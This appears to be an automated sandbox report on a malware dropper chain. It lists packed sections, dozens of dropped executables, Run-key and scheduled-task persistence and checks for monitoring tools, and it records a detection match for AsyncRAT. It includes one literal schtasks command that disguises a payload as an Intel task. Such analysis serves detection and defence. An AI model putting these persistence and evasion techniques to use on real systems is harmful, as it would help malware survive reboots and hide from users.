Source: random[2].exe2.9.dr	Static PE information: section name: .idata
Source: random[2].exe2.9.dr	Static PE information: section name:
Source: random[2].exe2.9.dr	Static PE information: section name: gptxkuce
Source: random[2].exe2.9.dr	Static PE information: section name: tnohnhsw
Source: random[2].exe2.9.dr	Static PE information: section name: .taggant
Source: 92133eb3c2.exe.9.dr	Static PE information: section name:
Source: 92133eb3c2.exe.9.dr	Static PE information: section name: .idata
Source: 92133eb3c2.exe.9.dr	Static PE information: section name:
Source: 92133eb3c2.exe.9.dr	Static PE information: section name: gptxkuce
Source: 92133eb3c2.exe.9.dr	Static PE information: section name: tnohnhsw
Source: 92133eb3c2.exe.9.dr	Static PE information: section name: .taggant
Source: random[3].exe0.9.dr	Static PE information: section name:
Source: random[3].exe0.9.dr	Static PE information: section name: .idata
Source: random[3].exe0.9.dr	Static PE information: section name:
Source: random[3].exe0.9.dr	Static PE information: section name: gghkcrho
Source: random[3].exe0.9.dr	Static PE information: section name: phbqiwyh
Source: random[3].exe0.9.dr	Static PE information: section name: .taggant
Source: 224de4e34e.exe.9.dr	Static PE information: section name:
Source: 224de4e34e.exe.9.dr	Static PE information: section name: .idata
Source: 224de4e34e.exe.9.dr	Static PE information: section name:
Source: 224de4e34e.exe.9.dr	Static PE information: section name: gghkcrho
Source: 224de4e34e.exe.9.dr	Static PE information: section name: phbqiwyh
Source: 224de4e34e.exe.9.dr	Static PE information: section name: .taggant
Source: random[4].exe.9.dr	Static PE information: section name:
Source: random[4].exe.9.dr	Static PE information: section name: .idata
Source: random[4].exe.9.dr	Static PE information: section name: ahfdhchk
Source: random[4].exe.9.dr	Static PE information: section name: qmoqclyl
Source: random[4].exe.9.dr	Static PE information: section name: .taggant
Source: 22b355416f.exe.9.dr	Static PE information: section name:
Source: 22b355416f.exe.9.dr	Static PE information: section name: .idata
Source: 22b355416f.exe.9.dr	Static PE information: section name: ahfdhchk
Source: 22b355416f.exe.9.dr	Static PE information: section name: qmoqclyl
Source: 22b355416f.exe.9.dr	Static PE information: section name: .taggant
Source: random[3].exe1.9.dr	Static PE information: section name:
Source: random[3].exe1.9.dr	Static PE information: section name: .idata
Source: random[3].exe1.9.dr	Static PE information: section name: tniryivd
Source: random[3].exe1.9.dr	Static PE information: section name: nnokcvcq
Source: random[3].exe1.9.dr	Static PE information: section name: .taggant
Source: 2002c77d6d.exe.9.dr	Static PE information: section name:
Source: 2002c77d6d.exe.9.dr	Static PE information: section name: .idata
Source: 2002c77d6d.exe.9.dr	Static PE information: section name: tniryivd
Source: 2002c77d6d.exe.9.dr	Static PE information: section name: nnokcvcq
Source: 2002c77d6d.exe.9.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E8D91C push ecx; ret	1_2_00E8D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E81359 push es; ret	1_2_00E8135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0048D91C push ecx; ret	2_2_0048D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0047BA83 push ss; retf	2_2_0047BA84
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0048D91C push ecx; ret	9_2_0048D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0048DFC6 push ecx; ret	9_2_0048DFD9

Source: file.exe	Static PE information: section name: entropy: 7.979751074581925
Source: skotes.exe.1.dr	Static PE information: section name: entropy: 7.979751074581925
Source: random[1].exe.9.dr	Static PE information: section name: hkbprtow entropy: 7.956209128486929
Source: 22b0b7688f.exe.9.dr	Static PE information: section name: hkbprtow entropy: 7.956209128486929
Source: random[1].exe0.9.dr	Static PE information: section name: entropy: 7.979706188474013
Source: random[1].exe0.9.dr	Static PE information: section name: lzigcvvj entropy: 7.9541420583885305
Source: 950932ab59.exe.9.dr	Static PE information: section name: entropy: 7.979706188474013
Source: 950932ab59.exe.9.dr	Static PE information: section name: lzigcvvj entropy: 7.9541420583885305
Source: random[3].exe.9.dr	Static PE information: section name: lvbdatvl entropy: 7.9540838527717685
Source: b93717638f.exe.9.dr	Static PE information: section name: lvbdatvl entropy: 7.9540838527717685
Source: random[2].exe2.9.dr	Static PE information: section name: gptxkuce entropy: 7.947458319333243
Source: 92133eb3c2.exe.9.dr	Static PE information: section name: gptxkuce entropy: 7.947458319333243
Source: random[3].exe0.9.dr	Static PE information: section name: entropy: 7.983064571783079
Source: random[3].exe0.9.dr	Static PE information: section name: gghkcrho entropy: 7.954187701530939
Source: 224de4e34e.exe.9.dr	Static PE information: section name: entropy: 7.983064571783079
Source: 224de4e34e.exe.9.dr	Static PE information: section name: gghkcrho entropy: 7.954187701530939
Source: random[4].exe0.9.dr	Static PE information: section name: .text entropy: 7.73440914387992

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\245347\Dry.com

Jump to dropped file

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\245347\Dry.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018906001\003.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\RzAAR0y[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File created: C:\Users\user\AppData\Local\Temp\UKzjyWlrjRLOjKNNlNHI.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exe	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22b355416f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22b355416f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22b355416f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\868694659E05004862FF CC52384910CEE944DDBCC575A8E0177BFA6B16E3032438B207797164D5C94B34

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
